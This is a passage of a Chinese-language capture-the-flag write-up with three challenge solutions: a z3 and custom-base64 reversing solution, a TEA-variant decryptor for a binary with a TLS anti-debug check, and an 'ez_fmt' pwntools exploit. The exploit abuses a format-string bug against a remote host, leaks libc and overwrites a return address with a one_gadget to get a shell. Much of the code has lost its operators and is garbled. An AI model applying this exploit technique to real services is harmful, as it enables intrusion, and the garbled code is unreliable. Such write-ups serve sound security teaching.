v8);memset(v22, 0, 0x32uLL);memcpy(v22, v23, 0x32uLL);v16 -1884415306;}if ( v16 ! -1125271585 )break;v16 502592025;}if ( v16 ! -1034568323 )break;v17;v16 359215778;}if ( v16 ! -728174227 )break;printf(wrong!);v26 0;v16 -88181297;}if ( v16 -139558179 ){printf(Wrong!);exit(-1);}if ( v16 ! -123677562 )break;srand(byte_406132);v6 strlen((const char *)(unsigned int)byte_406130);sub_401D10(byte_406130, v6);v7 1367925527;if ( (v21 1) ! 0 )v7 -1571665377;v16 v7;}if ( v16 -88181297 )break;switch ( v16 ){case 178472351:sub_402EE0(byte_406130, byte_406130[v20]);v19 0;v16 244862061;break;case 201400792:v16 -1034568323;break;case 244862061:v10 1368236239;if ( v19 v20 )v10 1736470037;v16 v10;break;case 282724921:v4 strlen(s);v21 0;v16 -1610796817;sub_401980(s, v22, v4);break;case 359215778:v12 strlen(v23);v13 2026466323;if ( v17 v12 )v13 1003071928;v16 v13;break;case 384994120:v11 -1125271585;if ( v18 v20 )v11 1105882884;v16 v11;break;case 502592025:sub_401EB0(v23, v24);v17 0;v16 359215778;break;case 728190549:v18 0;v16 384994120;break;case 874394363:v21;v16 -1610796817;break;case 951531691:v9 728190549;v20 64;if ( dword_4062C0 1 )v9 178472351;v16 v9;break;case 1003071928:v14 201400792;if ( byte_406180[v17] ! v24[v17] )v14 -728174227;v16 v14;break;case 1105882884:byte_406130[v18] ^ 0x27u;v16 1837459842;break;case 1111065332:v3 282724921;if ( v27 ! 34 )v3 -139558179;v16 v3;break;case 1367925527:sub_401250(v22, v23);memset(v22, 0, 0x32uLL);memcpy(v22, v23, 0x32uLL);v16 -1884415306;break;case 1368236239:v16 502592025;break;case 1558803342:v19;v16 244862061;break;case 1736470037:byte_406130[v19] (5 * (byte_406130[v19] 3)) ^ 0x15;v16 1558803342;break;case 1837459842:v18;v16 384994120;break;default:printf(right!);v26 0;v16 -88181297;break;}}return v26;
} 接收用户输入的字符串并对其进行一系列复杂的操作和检查。这些操作和检查是通过一个嵌套的while循环和switch语句实现的这个循环和语句的控制流程由一个状态变量v16控制。
在这个循环和语句中根据v16的值程序会执行不同的操作包括调用一些未在这段代码中定义的函数如sub_401980、sub_401D10等、改变v16的值、改变其他变量的值等。
然后在这找加密方式找了好久后来无意中发现了这个 先去除平坦混淆https://github.com/cq674350529/deflat然后分析加密 先base然后异或提取字符解
from z3 import Solver, BitVec, sat# 创建一个Solver对象
s Solver()# 创建一个长度为48的列表列表中的每个元素都是一个8位的BitVec对象
# BitVec对象的名称是它们在列表中的索引
needdd [BitVec(%d % i, 8) for i in range(48)]# 给定字节列表
cmp [0x3A, 0x2C, 0x4B, 0x51, 0x68, 0x46, 0x59, 0x63, 0x24, 0x04, 0x5E, 0x5F,0x00, 0x0C, 0x2B, 0x03, 0x29, 0x5C, 0x74, 0x70, 0x6A, 0x62, 0x7F, 0x3D,0x2C, 0x4E, 0x6F, 0x13, 0x06, 0x0D, 0x06, 0x0C, 0x4D, 0x56, 0x0F, 0x28,0x4D, 0x51, 0x76, 0x70, 0x2B, 0x05, 0x51, 0x68, 0x48, 0x55, 0x24, 0x19
]# 生成异或值列表
table [0x53, 0x46, 0x4E, 0x72, 0x49, 0x42, 0x6D, 0x6E, 0x4F, 0x4C, 0x10, 0x56,0x74, 0x7E, 0x62, 0x4D, 0x63, 0x16, 0x6C, 0x4A, 0x1E
]# 初始化变量v7
v7 2023for i in range(47):# 根据i的值使用不同的方式更新v7并从table中取出一个值与needdd[i]进行异或操作if i % 3 1:v7 (v7 5) % 20v3 table[v7 1]elif i % 3 2:v7 (v7 7) % 19v3 table[v7 2]else:v7 (v7 3) % 17v3 table[v7 3]# 将needdd[i]与v3进行异或操作并将结果存回needdd[i]needdd[i] needdd[i] ^ v3# 将needdd[i]的值存储在v4中v4 needdd[i]i 1# v4与下一个needdd[i]进行异或操作并将结果存回needdd[i]needdd[i] v4 ^ needdd[i]# 为Solver添加约束条件即needdd列表中的每个元素都必须与cmp列表中对应的元素相等
for i in range(48):s.add(cmp[i] needdd[i])# 检查是否存在满足所有约束条件的解
if s.check() sat:# 如果存在解则输出model s.model()print(model) 输出
[26 76, 8 87, 0 87, 33 82, 34 55, 44 110,42 68, 2 113, 12 79, 3 83, 16 102,28 107,38 55,14 105,27 108,29 69,22 83,9 66,43 71,11 108,1 90,25 116,19 106,24 115,4 87,18 97,20 87,31 70,45 112,32 87,46 61,30 102,13 114,17 99,10 76,36 47,15 69,21 66,7 116,23 82,39 100,35 106,5 99,47 61,40 77,41 67,37 82,6 85] 变异base64按顺序加解密
lUSN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLrFGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u7rad5CxljMXvNTBkm/8Hc0xwuZmy3DpQnSgj2LhUtrlVvNYksBX/MOoETaKqR4eb9WF8ICGzf6id1P75JApnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNbMf0YVd5L8c97/WkOTtuKFZyRBUPX6aplxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/bdycGPRMwWfr6 解密
import base64def custom_b64decode(s, custom_alphabet):standard_alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/# 创建一个翻译表translation_table str.maketrans(custom_alphabet, standard_alphabet)# 将自定义base64编码的字符串翻译成标准base64编码的字符串standard_b64encoded s.translate(translation_table)# 添加必要的填充字符padding_needed 4 - len(standard_b64encoded) % 4if padding_needed:standard_b64encoded * padding_needed# 解码标准base64编码的字符串return base64.b64decode(standard_b64encoded)# 自定义的base64 Alphabet
custom_alphabet lUSN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr
# 要解密的密文
encoded_string B6gtBdq8BGN1VXyIdECBGt9a8N1TyIvB9hCo9hDA543uc# 解密操作
decoded_bytes custom_b64decode(encoded_string, custom_alphabet)decoded_string decoded_bytes.decode(utf-8)
print(decoded_string)flag{3ea590ccwxehg715264fzxnzepqz}
ez_fmt
给定了输入的堆栈地址和格式化字符串漏洞我们可以修改任何地址。但是程序执行完毕后w会被设置为0这使得下一次利用变得更加困难。因此我们需要在w被设置为0之前进行操作。
我们可以修改printf的返回地址。同时由于printf函数需要堆栈对齐所以返回地址应该被设置为0x4011ED。此外我们还需要泄露出libc地址以便进行第二次利用将函数的返回地址修改为one_gadget。
from pwn import *# 设置pwntools的上下文环境为Linux amd64
context(oslinux, archamd64, log_leveldebug)#p process(./ez_fmt)
p remote(47.104.24.40, 1337)# 加载本地的二进制文件和libc文件
elf ELF(./ez_fmt)
libc ELF(./libc-2.31.so)# 接收直到遇到0x然后读取12个字符转换为栈地址
p.recvuntil(0x)
stackint(p.recv(12),16)
print(hex(stack))# 构造payload用于修改栈上的值
payb%4589c%11$hn%19$p.ljust(0x28,b\x00)p64(stack-8)
p.send(pay)# 再次接收直到0x读取12个字符计算libc基地址
p.recvuntil(0x)
libc_baseint(p.recv(12),16)-libc.sym[__libc_start_main]-243
print(hex(libc_base))# 计算one_gadget的地址
one_gadgetlibc_base0xe3b01
p.recvuntil(\n)# 计算one_gadget的低16位
one_gadget_low one_gadget0xffff
# 计算one_gadget的高16位
one_gadget_high (one_gadget16)0xffff# 构造格式化字符串用于写入one_gadget的低16位
fmt_low b%str(one_gadget_low).encode()bc%10$hn
# 构造格式化字符串用于写入one_gadget的高16位
fmt_high b%str(((one_gadget16)0xffff)-(one_gadget_low)).encode()bc%11$hn# 将两个格式化字符串连接起来然后用\x00填充到0x20字节
fmt_str (fmt_lowfmt_high).ljust(0x20,b\x00)# 计算要写入的内存地址
addr_low p64(stack0x68)
addr_high p64(stack0x68 2)# 构造最终payload
payfmt_straddr_lowaddr_high
p.send(pay)p.interactive()Babyre
发现有TLS __int64 __fastcall TlsCallback_1_0(__int64 a1, char a2)
{__int64 v2; // rcxstruct _PEB *v3; // rax__int64 result; // raxint i; // [rsp44h] [rbp24h]sub_14001138E(unk_1400240F4);v3 NtCurrentPeb();LOBYTE(v3) v3-BeingDebugged;if ( (_BYTE)v3 1 ){LOBYTE(v2) v3-BeingDebugged;sub_140011AE0(v2);}result a2 1;if ( (a2 1) ! 0 ){for ( i 0; i 32; i ){*((_BYTE *)off_14001E060 i 1) ^ i;result (unsigned int)(i 1);}}return result;
}__int64 sub_140012050()
{char *v0; // rdi__int64 i; // rcxchar v3[32]; // [rsp0h] [rbp-20h] BYREFchar v4; // [rsp20h] [rbp0h] BYREF_DWORD v5[15]; // [rsp28h] [rbp8h] BYREFint j; // [rsp64h] [rbp44h]int k; // [rsp84h] [rbp64h]v0 v4;for ( i 34i64; i; --i ){*(_DWORD *)v0 -858993460;v0 4;}sub_14001138E((__int64)unk_1400240F4);sub_1400111A9((__int64)unk_14001AD78);sub_14001123F(aPleaseInputYou);std::istream::getline(std::cin, Str, 33i64);if ( j_strlen(Str) 32 ){memset(v5, 0, 0x20ui64);sub_140011019((__int64)v5, (__int64)Str);for ( j 0; j 4; j )sub_14001106E(v5[2 * j], v5[2 * j 1]);sub_140011087((__int64)v5, (__int64)byte_14001E218);for ( k 0; k 32; k ){if ( byte_14001E040[k] ! byte_14001E218[k] ){sub_14001123F(aNoNoNo);sub_1400111A9((__int64)%d);goto LABEL_15;}}sub_14001123F(aYes);}else{sub_1400111A9((__int64)Wrong Length!);}
LABEL_15:sub_140011325(v3, unk_14001AD30);return 0i64;
} 最后exp
#includestdio.h
#includestdint.h// 定义解密函数使用TEA算法的变种进行解密
void decrypt(uint32_t v[2], uint32_t const key[4])
{unsigned int i,j;// 初始化变量v0和v1为要解密的数据delta为一个常数sum为解密过程中使用的累加变量uint32_t v0v[0], v1v[1], delta0x88408067, sum0xd192c263;// 进行32轮解密操作for(i0;i4;i){for(j0;j33;j){// 每轮解密中减去delta更新sum值sum-delta;// 根据TEA算法变种进行解密的核心步骤v1-(((v05)^(v04))v0)^(sumkey[(sum11)3]);v0-(((v15)^(v14))v1)^(sumkey[sum3])^sum;}}// 将解密后的数据写回原数组v[0]v0;v[1]v1;
}int main()
{// 初始化要解密的数据数组uint32_t array[8]{0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};// 初始化密钥uint32_t key[4]{0x62, 0x6F, 0x6D, 0x62};// 循环解密数组中的每对数据for(int i0;i8;i2){uint32_t temp[2];// 取出一对数据temp[0]array[i];temp[1]array[i 1];// 调用解密函数decrypt(temp, key);// 打印解密后的数据每个uint32_t解密后为4个字符printf(%c%c%c%c%c%c%c%c,(char)(temp[0] 0), (char)(temp[0] 8), (char)(temp[0] 16), (char)(temp[0] 24),(char)(temp[1] 0), (char)(temp[1] 8), (char)(temp[1] 16), (char)(temp[1] 24));}return 0;
}flag{W31com3_2_Th3_QwbS7_4nd_H4v3_Fun}
